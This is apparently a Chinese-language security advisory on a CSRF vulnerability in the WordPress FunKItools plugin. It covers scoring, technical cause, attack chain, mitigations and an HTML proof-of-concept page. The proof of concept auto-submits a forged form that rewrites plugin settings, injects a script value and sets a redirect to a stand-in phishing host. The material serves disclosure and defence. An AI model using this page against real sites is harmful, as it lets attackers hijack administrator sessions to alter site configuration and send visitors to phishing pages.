CVE-2025-10301：WordPress FunKItools插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-10301

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress FunKItools插件

漏洞概述

CVE-2025-10301是WordPress FunKItools插件中存在的一个跨站请求伪造（CSRF）漏洞。该漏洞影响所有1.0.2及以下版本的FunKItools插件，由Wordfence安全团队的安全研究员发现并报告。FunKItools是一款用于WordPress网站的工具类插件，提供了多种实用功能。然而，该插件在实现saveFields()函数时存在严重的安全缺陷，缺少正确的一次性令牌（nonce）验证机制，导致未经身份验证的攻击者可以通过伪造请求来修改插件设置。

根据CVSS 3.1评分系统，该漏洞评分为4.3分，属于中等严重级别。攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），无需任何权限（PR:N），但需要用户交互（UI:R）。该漏洞主要影响数据的完整性（I:L），对机密性和可用性没有直接影响。攻击者需要诱骗已登录的管理员点击恶意链接或访问恶意页面，才能成功利用此漏洞。

尽管该漏洞需要用户交互才能触发，但由于WordPress管理员通常具有较高的权限，且CSRF攻击的隐蔽性较强，管理员很难察觉自己正在被攻击。一旦管理员在已登录状态下访问了攻击者构造的恶意页面，攻击者就可以利用管理员的权限修改插件配置，可能导致网站功能异常、信息泄露或为进一步攻击铺平道路。

技术细节

该漏洞的核心问题在于FunKItools插件的saveFields()函数缺少正确的一次性令牌（nonce）验证机制。在WordPress中，nonce（number used once）是一种防止CSRF攻击的标准安全机制，通常通过wp_create_nonce()函数生成，并通过check_admin_referer()或wp_verify_nonce()函数进行验证。

根据参考链接中的源代码（plugins.trac.wordpress.org/browser/funkitools/trunk/includes/controllers/options/page.php的第59行），saveFields()函数在处理表单提交时，没有对传入的请求进行nonce验证。这意味着任何能够诱使已登录的管理员发起HTTP请求的恶意网站，都可以直接向目标站点的saveFields端点发送POST请求，而无需携带有效的nonce令牌。

攻击者利用此漏洞的典型方式如下：首先，攻击者构造一个包含恶意表单的HTML页面，该表单的action属性指向目标WordPress站点的saveFields端点，表单中包含攻击者希望修改的插件设置参数。然后，攻击者通过社会工程学手段（如钓鱼邮件、即时消息等）诱骗已登录的目标站点管理员访问该恶意页面。当管理员访问页面时，恶意表单会自动提交（或通过JavaScript自动触发），浏览器会自动携带管理员的会话cookie发送请求。由于目标站点的saveFields函数不验证nonce，请求会被成功处理，插件设置被恶意修改。

由于该漏洞允许未经身份验证的攻击者修改插件设置，攻击者可以篡改插件配置，可能导致网站显示异常内容、功能被禁用，或为后续更严重的攻击（如权限提升、数据泄露等）创造条件。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标WordPress站点是否安装了FunKItools插件（版本<=1.0.2），可以通过查看页面源代码、插件目录或使用WPScan等工具进行确认。

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含CSRF表单的HTML页面，表单的action指向目标站点的saveFields端点，表单中包含攻击者希望修改的插件设置参数。

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、即时消息或社交媒体等方式，诱骗已登录目标站点的管理员访问恶意页面。

STEP 4

步骤4：触发CSRF攻击

管理员在已登录状态下访问恶意页面，浏览器自动提交表单并携带管理员的会话cookie发送请求到目标站点。

STEP 5

步骤5：设置被篡改

由于saveFields()函数缺少nonce验证，恶意请求被成功处理，插件设置被攻击者修改，可能导致网站异常或为后续攻击铺路。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
CVE-2025-10301: FunKItools WordPress Plugin CSRF PoC
Vulnerability: Missing nonce validation in saveFields() function
Affected: FunKItools <= 1.0.2
-->
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <!-- CSRF exploit form targeting the vulnerable saveFields() function -->
    <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=funkitools-options" method="POST" id="csrf-form">
        <!-- Malicious settings to overwrite plugin configuration -->
        <input type="hidden" name="action" value="saveFields" />
        <input type="hidden" name="option[malicious_setting_1]" value="attacker_controlled_value" />
        <input type="hidden" name="option[malicious_setting_2]" value="<script>alert('XSS')</script>" />
        <input type="hidden" name="option[redirect_url]" value="http://evil-site.com/phishing" />
        <input type="submit" value="Click here to continue" />
    </form>
    <script>
        // Auto-submit the form when the page loads
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

影响范围

FunKItools <= 1.0.2

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）暂时禁用FunKItools插件，直到更新到安全版本；2）为WordPress管理员账户启用双因素认证（2FA），降低管理员账户被利用的风险；3）在Web应用防火墙（WAF）层面添加规则，阻止对saveFields端点的未经授权的POST请求；4）对管理员进行安全意识培训，提高对钓鱼攻击的识别能力，避免点击可疑链接；5）定期审查插件设置变更日志，及时发现异常的设置修改。